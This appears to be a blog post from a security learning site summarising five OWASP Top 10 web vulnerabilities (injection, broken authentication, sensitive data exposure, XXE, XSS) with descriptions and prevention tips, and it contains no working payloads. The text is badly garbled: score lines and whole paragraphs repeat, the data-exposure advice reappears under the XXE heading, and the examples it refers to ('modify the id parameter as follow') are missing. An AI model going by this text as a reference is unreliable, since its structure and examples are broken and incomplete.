1. Injection
a score of Exploitability: Easy
a score of Detectability: Easy
a score of Technical Impact: Severe
a score of Detectability: Easy
a score of Technical Impact: Severe
What is it?
An injection of code takes place when an attacker sends invalid data to the utility as a part of a command. the attacker has the malicious goal to trick the application into executing accidental behavior to collect information or create damage.
the most common injections :
- SQL
- OS command
- ORM
- LDAP
- OGNL injection or Expression Language (EL)
Example of attackthe most common injections :
the most examples are when the SQL query consuming some data untrusted.
the query can be exploited by modifying the “id” parameter value as follow:
the application receives a request to return all records from the account table, other similar and other severe injections can modify data, and even can cause a loss of data.
the query can be exploited by modifying the “id” parameter value as follow:
How to prevent it?
The main reason for injections to happen is the lack of validation and sanitation of data consumed by the application. preventing this injection depends on the technology used. In general, you have to make sure that the development team is following security requirements when writing code.
prevent the injection of code by following these two important points:
- The main key to preventing is to separate data from queries.
- Use safe APIs to eliminate the risk of SQL injections.
2. Broken Authentication
A score of Exploitability: Easy
A score of Detectability: Average
A score of Technical Impact: Severe
What is it?
Broken authentication is vulnerability that can allow attackers to use manual or automatic ways to gain control over any account in a system and even gain total control.
A score of Detectability: Average
A score of Technical Impact: Severe
What is it?
Broken authentication is vulnerability that can allow attackers to use manual or automatic ways to gain control over any account in a system and even gain total control.
Example of an attack
“According to OWASP, “Credential stuffing” which is the use of lists of passwords already known, is one of the most attacks. If an application does not rate limit authentication, the application can be used as an oracle password to determine whether the credentials are valid.”
How to prevent it?
The team must implement the best practices for web security followed by external security audits and testing the code before shipping it out.
Other common pointers include:
How to prevent it?
The team must implement the best practices for web security followed by external security audits and testing the code before shipping it out.
Other common pointers include:
- Do not deploy any default credentials
- passwords must be stored using a modern hash function
- Checks the weak password against a list of the top 10000 worst passwords.
- Implement many factor authentication to prevent credential stuffing, brute force, and stolen credential attacks.
- Check failures authentication and alert administrators when attacks are detected.
- Limit the attempts for authenticating
- Secure your password storage
3. Sensitive Data Exposure
Exploitability score: Average
Detectability score: Average
Technical Impact score: Severe
Detectability score: Average
Technical Impact score: Severe
What is it?
Sensitive data exposure is one of the most common vulnerabilities to exploit. It consists of an attacker to compromise data that have been protected. Sensitive data such as credit card numbers, passwords, social security numbers, health records and PII (Personally identifiable information).
Example of an attack
The situations happen when a site doesn’t use or enforce TLS for all pages of the website, or if it has weak encryption.
“An attacker can simply monitor the traffic network, intercept the TLS, and steals the user’s session cookie. the attacker then takes this cookie and hijacks the user’s ( session, accessing or modifying the private data of user's.This attack can be modified in other ways such as changing the recipient of a money transfer.”
The situations happen when a site doesn’t use or enforce TLS for all pages of the website, or if it has weak encryption.
“An attacker can simply monitor the traffic network, intercept the TLS, and steals the user’s session cookie. the attacker then takes this cookie and hijacks the user’s ( session, accessing or modifying the private data of user's.This attack can be modified in other ways such as changing the recipient of a money transfer.”
How to prevent it?
Data should be protected at all times – while in transit. while at rest,
and also Not encrypting data is the main reason why attacks are so common nowadays.
- Password hashing storages
- Key generation process
- Key management
- Protocol usage
Some other pointers:
- Classify stored data, processed or transmitted by an application.
- Avoid storing sensitive data for unnecessary reasons.
- Encrypt all sensitive data.
- Ensure updates and strong algorithms, protocols, and keys are in place; use proper key management.
- Encrypt every transmitted data with secure protocols such as TLS with perfect forward secrecy (PFS) ciphers, cipher prioritization by the server, and secure parameters.
- Encryption must be used by directives like HTTP Strict Transport Security (HSTS).
4. XML External Entities (XXE)
Exploitability score: Average
Detectability score: Easy
Technical Impact score: Severe
Data should be protected at all times – while in transit. while at rest,
and also Not encrypting data is the main reason why attacks are so common nowadays.
and also Not encrypting data is the main reason why attacks are so common nowadays.
- Password hashing storages
- Key generation process
- Key management
- Protocol usage
- Classify stored data, processed or transmitted by an application.
- Avoid storing sensitive data for unnecessary reasons.
- Encrypt all sensitive data.
- Ensure updates and strong algorithms, protocols, and keys are in place; use proper key management.
- Encrypt every transmitted data with secure protocols such as TLS with perfect forward secrecy (PFS) ciphers, cipher prioritization by the server, and secure parameters.
- Encryption must be used by directives like HTTP Strict Transport Security (HSTS).
4. XML External Entities (XXE)
What is it?
An XML attack takes place while an application that parses XML input is attacked. the attack can occur whilst XML input includes a reference to an external entity and when the reference is processed by a weakly configured XML parser.
Example of an attack
DTDs: XXE attack
Red circles can indicate the evil entity inside the request.
Red circles can indicate the evil entity inside the request.
How to prevent it?
- Most XML parsers are vulnerable to XXE attacks. That's why it is so important to have good developers, so they can learn to identify and mitigate risks.
- The best way to prevent XXE is to disable always DTDs (External Entities) completely depending on the parser. the following example is the best method of configuration :
disabling DTDs also makes the parser secure.
disabling DTDs also makes the parser secure.
5. Cross-Site Scripting (XSS)
Exploitability score: Easy
Detectability score: Easy
Technical Impact score: Moderate
Detectability score: Easy
Technical Impact score: Moderate
What is it?
Cross-Site Scripting is the most common vulnerabilities that can affect many web applications. XSS attacks are essentially the malicious injections (client-side) that are added to a web page or app through comments of users, submissions form, and so on.
Example of an attack
The application uses untrusted data in the construction of HTML snippet without validation or escaping:
The attacker can modify the ‘CC’ parameter in the browser :
XSS attack can cause the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the victim’s current session.
How to prevent it?
- Use safer frameworks that automatically escape for XSS, such as in React JS or Ruby 3.0.
- Escape untrusted HTTP request data based on the context in the HTML output ( CSS, JavaScript, attribute, body, or URL) to resolve Reflected and Stored XSS vulnerabilities.
- Content Security Policy (CSP), it is a defensive, This assumes that no other vulnerabilities exist that would allow placing malicious code through local files including vulnerable libraries in permitted sources or path traversal overwrites, such as content delivery network or local libraries.
best regards!
learnwithacmounta
learnwithacmounta is the best security/programming community
Post a Comment